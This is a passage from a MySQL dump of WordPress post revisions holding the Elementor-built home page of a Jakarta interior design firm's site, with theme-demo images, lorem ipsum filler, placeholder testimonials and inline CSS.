disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-25 10:34:17','2023-05-25 10:34:17','',22,'https://bauhaus.futuremediatrix.com/?p=4768',0,'revision','',0);
INSERT INTO `wpev_posts` VALUES (4769,2,'2023-05-25 10:34:17','2023-05-25 10:34:17','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n	        				<h4>\n					Home Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n	        				<h4>\n					Commercial Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-25 10:34:17','2023-05-25 10:34:17','',22,'https://bauhaus.futuremediatrix.com/?p=4769',0,'revision','',0),(4771,2,'2023-05-25 10:48:56','2023-05-25 10:48:56','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n	        				<h4>\n					Home Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n	        				<h4>\n					Commercial Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					